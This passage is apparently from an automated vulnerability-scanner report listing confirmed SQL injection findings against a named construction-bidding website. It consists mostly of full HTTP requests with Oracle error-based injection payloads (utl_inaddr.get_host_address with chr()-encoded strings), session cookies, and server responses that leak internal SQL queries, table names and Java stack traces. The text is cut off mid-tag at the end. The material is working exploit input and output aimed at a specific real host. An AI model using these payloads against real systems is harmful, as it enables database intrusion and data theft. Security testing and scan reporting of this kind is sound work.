AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) ORDER BY j.bid_date asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:13 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:14 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11096
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:35.146 [ 1] (TP-Processor1759) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASCORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:03:13 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:14 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11096
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:35.146 [ 1] (TP-Processor1759) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASCORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:15 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10911
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a 